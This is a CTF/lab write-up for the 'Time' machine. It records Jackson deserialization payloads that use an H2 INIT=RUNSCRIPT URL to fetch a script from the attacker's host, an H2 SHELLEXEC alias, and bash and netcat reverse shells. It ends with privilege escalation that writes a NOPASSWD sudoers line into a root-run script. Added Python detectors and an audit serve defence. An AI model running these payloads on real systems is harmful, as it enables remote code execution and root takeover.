Lab - HackyHour3 - Time

Machine: Time

Step 1: Recon

nmap -sC -sV 10.129.32.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-31 00:21 UTC
Nmap scan report for ip-10-129-32-8.ec2.internal (10.129.32.8)
Host is up (0.083s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: No content to map due to end-of-input

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'ture': was expecting 'null', 'true', 'false' or NaN

Validation failed:
Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'microtaskDebounce': was expecting ('true', 'false' or 'null')

Validation failed:
Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'w': was expecting ('true', 'false' or 'null')

Validation failed:
Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'w': was expecting ('true', 'false' or 'null')

Validation failed:
Unhandled Java exception:
com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT),
expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object



Payload: Validation failed:
Unhandled Java exception:
com.fasterxml.jackson.databind.JsonMappingException: URL format error;
must be "jdbc:h2:{ {.|mem:}[name] | [file:]fileName | {tcp|ssl}:[//]server[:port][,server2[:port]]/name }[;key=value...]"
but is  "jdbc:h2:tcp://10.10.14.50:8989" [90046-199] (through reference chain: ch.qos.logback.core.db.DriverManagerConnectionSource["connection"])


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.50/"}]

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.JsonMappingException:
Connection is broken: "java.net.ConnectException: Connection refused (Connection refused): 10.10.14.50" [90067-199] (through reference chain: ch.qos.logback.core.db.DriverManagerConnectionSource["connection"])



Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.JsonMappingException:
No suitable driver found for jdbc:tcp://10.10.14.50/ (through reference chain: ch.qos.logback.core.db.DriverManagerConnectionSource["connection"])


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.50/"}]

$ nc -vv -l 10.129.32.8 -p 9000


"[\"ch.qos.logback.core.db.DriverManagerConnectionSource $ nc -lv 9000 rce\", {"url":"jdbc:h2:tcp://10.129.32.8/"}]"

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('u' (code 117)): was expecting comma to separate Array entries

Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('\' (code 92)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')


Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.InvalidTypeIdException:
Could not resolve type id 'ch.qos.logback.core.db.DriverManagerConnectionSource $ nc -lv 9000 rce' as a subtype of [simple type, class java.lang.Object]: no such class found


"[\"ch.qos.logback.core.db.DriverManagerConnectionSource $ nc -lv 9000 rce\", {"url":"jdbc:h2:tcp://10.129.32.8/"}]"
# Validation successful!


"["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://localhost:9000/inject.sql'"}]"





# setup the web page

python -m SimpleHTTPServer 9000 # py2
python3 -m http.server 9000

https://0.0.0.0:9000/


"[\"ch.qos.logback.core.db.DriverManagerConnectionSource $ nc -lv 9000 rce\", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://localhost:9000/inject.sql'"}]"
# Validation successful!


"["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://localhost:9000/inject.sql'"}]"


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]
# running for long time
# Validation failed: 2020-10-31 01:59:30 command: slow query: 118 ms


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.129.32.8:9000/inject.sql'"}]
# Validation failed: 2020-10-31 01:56:26 lock: 3 shared read lock unlock SYS


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://0.0.0.0:9000/inject.sql'"}]
# Validation failed: 2020-10-31 01:53:53 lock: 3 shared read lock unlock SYS

"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://0.0.0.0:9000/inject.sql'"}]"
# Validation successful!

"[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.129.32.8:9000/inject.sql'"}]"
# Validation successful!


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.129.32.8:9000/inject.sql'"}]
# Validation failed: 2020-10-31 02:09:42 lock: 3 shared read lock unlock SYS


["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]
# CALL SHELLEXEC('nc 10.10.14.50 9000')
# Validation failed: 2020-10-31 02:28:18 command: slow query: 641 ms
# Validation failed: 2020-10-31 02:31:47 command: slow query: 632 ms
# Validation failed: 2020-10-31 02:33:06 command: slow query: 647 ms
# Validation failed: 2020-10-31 02:33:06 command: slow query: 647 ms

# htbox        >  my kali listen on 2424
# 10.129.32.8     10.10.14.50



["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]
# CALL SHELLEXEC('nc 10.10.14.50 2424 –e /bin/bash')
# CALL SHELLEXEC('nc -e /bin/sh 10.10.14.50 2424')
# host:
# $ nc -vv -l 0.0.0.0 -p 2424
# 0.0.0.0: inverse host lookup failed: Unknown host
# listening on [any] 2424 ...
# invalid connection to [10.10.14.50] from ip-10-129-32-8.ec2.internal [10.129.32.8] 58842
# htb:
# Validation failed: 2020-10-31 02:43:35 lock: 3 exclusive write lock requesting for SYS

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9004/inject.sql'"}]


# be careful for the special character:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]



# inject.sql:
bash -i >& /dev/tcp/10.10.14.50/2424 0>&1


# host:
nc -lvp 2424
listening on [any] 2424 ...
connect to [10.10.14.50] from ip-10-129-32-8.ec2.internal [10.129.32.8] 58866
bash: cannot set terminal process group (960): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$


# -o names an output file; hashcat takes the hash (or hash file) and then the wordlist as positional arguments
hashcat -m 1400 -a 0 10790631378d0d5e0d85e40ca7f23a17 /usr/share/wordlists/rockyou.txt
# -m 1400 is raw SHA-256 (64 hex chars); the 32-char value above is MD5-length (-m 0), so check the mode against the hash actually recovered

require 'java'
# Put every jar in ./classpath (jackson-databind, logback, h2, ...) on the JRuby classpath
Dir["./classpath/*.jar"].each do |f|
    require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
# Unsafe on purpose, to reproduce the target: default typing lets the JSON input name the
# Java class to instantiate (the ["class.Name", {...}] wrapper-array form in the errors above).
# Hardened code leaves this off, or restricts it with a PolymorphicTypeValidator.
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false)
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)
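The error messages and the harness above show the two things an application boundary can check for before a body ever reaches a mapper with default typing enabled: a Jackson As.WRAPPER_ARRAY type id, and an H2 JDBC URL whose settings run SQL at connect time. The Python below is an added example, not code from the lab or from the target application: it walks a request body for `["fully.qualified.Class", {...}]` wrappers, parses any H2 URL it finds following the grammar quoted in the JsonMappingException above, and reports `INIT=` settings and remote `tcp:`/`ssl:` locations. The class-name regex is my assumption; the sample bodies are the payload shapes recorded above plus one constructed benign document. This is a backstop only; the real fix is not enabling default typing on untrusted input.

```python
"""Boundary check for the input pattern seen in the errors above. Added example, not
code from the lab or the target: it looks for Jackson As.WRAPPER_ARRAY type ids
(["fully.qualified.Class", {...}]) and parses any H2 JDBC URL they carry."""
import json
import re

# Assumed shape of a Java fully-qualified class name: dotted package, capitalised class.
_FQCN = re.compile(r"^(?:[a-zA-Z_$][\w$]*\.)+[A-Z][\w$]*$")


def find_type_wrappers(node):
    """Yield (class_name, properties) for every wrapper array in the document,
    descending into nested arrays and objects."""
    if isinstance(node, list):
        if (len(node) == 2 and isinstance(node[0], str)
                and _FQCN.match(node[0]) and isinstance(node[1], dict)):
            yield node[0], node[1]
        for item in node:
            yield from find_type_wrappers(item)
    elif isinstance(node, dict):
        for value in node.values():
            yield from find_type_wrappers(value)


def split_settings(rest):
    """Split ';'-separated KEY=VALUE settings, leaving ';' inside '...' alone."""
    parts, buf, quoted = [], [], False
    for ch in rest:
        if ch == "'":
            quoted = not quoted
        if ch == ";" and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p for p in parts if p]


def parse_h2_url(url):
    """Return {'location': ..., 'settings': {...}} for a jdbc:h2: URL, following the
    grammar quoted in the JsonMappingException above; None for any other URL."""
    if not url.lower().startswith("jdbc:h2:"):
        return None
    location, _, rest = url[len("jdbc:h2:"):].partition(";")
    settings = {}
    for part in split_settings(rest):
        key, _, value = part.partition("=")
        settings[key.strip().upper()] = value.strip()
    return {"location": location, "settings": settings}


def assess(raw_json):
    """Return findings for one request body; an empty list means nothing was flagged."""
    findings = []
    try:
        doc = json.loads(raw_json)
    except ValueError as exc:
        return [f"not valid JSON: {exc}"]
    for cls, props in find_type_wrappers(doc):
        findings.append(f"polymorphic type id in input: {cls}")
        for key, value in props.items():
            if not (isinstance(value, str) and value.lower().startswith("jdbc:")):
                continue
            parsed = parse_h2_url(value)
            if parsed is None:
                findings.append(f"{key}: non-H2 JDBC URL {value}")
                continue
            if "INIT" in parsed["settings"]:
                findings.append(f"{key}: H2 INIT runs SQL at connect time: {parsed['settings']['INIT']}")
            if parsed["location"].startswith(("tcp:", "ssl:")):
                findings.append(f"{key}: H2 URL targets a remote server {parsed['location']}")
    return findings


# Sample bodies: the two payload shapes recorded in the notes above, plus a constructed
# benign document that should produce no findings.
SAMPLES = {
    "benign": '{"name": "time", "tags": ["a", "b"], "nested": {"list": [1, 2]}}',
    "remote_h2": '["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.50/"}]',
    "init_runscript": """["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'https://10.10.14.50:9000/inject.sql'"}]""",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, assess(body) or "clean")
```

Two design points: the walk descends into nested containers because a wrapper array can sit anywhere the mapper will deserialize an `Object`, and the settings splitter honours single quotes because `RUNSCRIPT FROM '...'` can legally carry a `;` inside the quoted script location.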
-- CREATE ALIAS SHELLEXEC
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    // "\\A" (whole-input delimiter): the backslash must be escaped in Java source, a bare "\A" does not compile
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";  }
$$;

-- CALL ALIAS SHELLEXEC with input
-- CALL SHELLEXEC('id > exploited.txt')
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.50/2424 0>&1')

inside the box

pericles@time: cd /home/pericles/snap/lxd/current/.config/lxc


pericles@time:/home/pericles/snap/lxd/current/.config/lxc$ cat config.yml
cat config.yml
default-remote: local
remotes:
  images:
    addr: https://images.linuxcontainers.org
    protocol: simplestreams
    public: true
  local:
    addr: unix://
    public: false
aliases: {}

ps fauxwww


pericles@time:/home/pericles/snap/lxd/current/.config/lxc$ lxc remote list
lxc remote list
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
|      NAME       |                   URL                    |   PROTOCOL    |  AUTH TYPE  | PUBLIC | STATIC |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
| images          | https://images.linuxcontainers.org       | simplestreams | none        | YES    | NO     |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
| local (default) | unix://                                  | lxd           | file access | NO     | YES    |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
| ubuntu          | https://cloud-images.ubuntu.com/releases | simplestreams | none        | YES    | YES    |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+
| ubuntu-daily    | https://cloud-images.ubuntu.com/daily    | simplestreams | none        | YES    | YES    |
+-----------------+------------------------------------------+---------------+-------------+--------+--------+

# revert to an older revision does not work
pericles@time:/home/pericles$ snap revert snap --revision=2.37.1
snap revert snap --revision=2.37.1
error: access denied (try with sudo)



pericles@time:/home/pericles/snap/lxd/current/.config/lxc$ ls -aslh /run/snapd*
0 srw-rw-rw- 1 root root  0 Nov  7 00:37 /run/snapd-snap.socket
0 srw-rw-rw- 1 root root  0 Nov  7 00:37 /run/snapd.socket



/run/snapd:
total 0
0 drwxr-xr-x  4 root root  80 Nov  7 00:37 .
0 drwxr-xr-x 27 root root 860 Nov  7 01:34 ..
0 drwxr-xr-x  2 root root  80 Nov  7 00:37 lock
0 drwxr-xr-x  2 root root 100 Nov  7 00:37 ns

right path

# long process
$ ps fauxwww
ps faxwxxx
    PID TTY      STAT   TIME COMMAND
      2 ?        S      0:00 [kthreadd]
      3 ?        I<     0:00  \_ [rcu_gp]


# run a script
$ linpeas.sh

[+] .sh files in path
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
You own the script: /usr/bin/timer_backup.sh
/usr/bin/rescan-scsi-bus.sh


$ cd /usr/bin
total 114572
drwxr-xr-x  2 root     root        36864 Oct 23 06:41 .
drwxr-xr-x 14 root     root         4096 Apr 23  2020 ..
lrwxrwxrwx  1 root     root            4 Feb 17  2020 NF -> col1

$ cd /etc/sudoers.d
total 20
drwxr-xr-x   2 root root 4096 Nov 14 01:38 .
drwxr-xr-x 102 root root 4096 Oct 23 06:44 ..
-r--r-----   1 root root   91 Apr 10  2020 99-snapd.conf
-r--r-----   1 root root  958 Feb  3  2020 README
-rw-r--r--   1 root root   33 Nov 14 01:39 rw

$ touch rw

$ echo "echo 'pericles ALL=(ALL) NOPASSWD: ALL' > etc/sudoers.d/rw" >> /usr/bin/timer_backup.sh

$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
echo 'pericles ALL=(ALL) NOPASSWD: ALL' > etc/sudoers.d/rw


pericles@time:/etc/sudoers.d$ sudo su -
sudo su -
whoami
root
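What made the difference was not a kernel or snap weakness but a script in /usr/bin that a scheduled root job runs and that the login user could edit. The Python below is an added example, not from the original notes: it checks a set of directories for `*.sh` files that a non-root user could modify, judged from the owner and the group/other write bits, and demonstrates the check on a constructed temporary directory rather than the real /usr/bin. Which scheduler runs the script (a systemd timer or a cron entry) still has to be confirmed separately; the check here covers ownership and mode only.

```python
"""Audit for the condition linpeas reported above: a script that root runs on a
schedule but that an unprivileged user can modify. Added example, not part of the
original notes; it inspects ownership and mode bits only."""
import os
import stat
import tempfile


def is_writable_by_non_root(path, trusted_uids=(0,)):
    """True if the file's owner is not a trusted uid, or if group/other can write it."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_risky_scripts(directories, suffixes=(".sh",), trusted_uids=(0,)):
    """Return paths of scripts under the given directories that a non-root user can change."""
    risky = []
    for directory in directories:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if not os.path.isfile(path) or not name.endswith(suffixes):
                continue
            if is_writable_by_non_root(path, trusted_uids):
                risky.append(path)
    return risky


def demo():
    """Build a constructed /usr/bin-like directory with one world-writable script (the
    timer_backup.sh situation) and one 0755 script, and return the basenames flagged."""
    with tempfile.TemporaryDirectory() as d:
        bad = os.path.join(d, "timer_backup.sh")
        good = os.path.join(d, "gettext.sh")
        for p in (bad, good):
            with open(p, "w") as fh:
                fh.write("#!/bin/bash\n")
        os.chmod(bad, 0o777)
        os.chmod(good, 0o755)
        # The files we just created are owned by the current user, so for the demo the
        # current uid is the trusted owner; on a real host the trusted set is root only.
        found = find_risky_scripts([d], trusted_uids=(os.getuid(),))
        return [os.path.basename(p) for p in found]


if __name__ == "__main__":
    print("constructed demo:", demo())
    # On a live host, scan the usual script locations with root as the only trusted owner.
    print("live scan:", find_risky_scripts(["/usr/bin", "/usr/local/bin", "/usr/sbin"]))
```

The 0755 script is left alone because only its root-equivalent owner can write it; the 0777 one is flagged because the group and other write bits are set, which is exactly the state `ls -l` would have shown for `/usr/bin/timer_backup.sh` on the box.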



This post is licensed under CC BY 4.0 by the author.
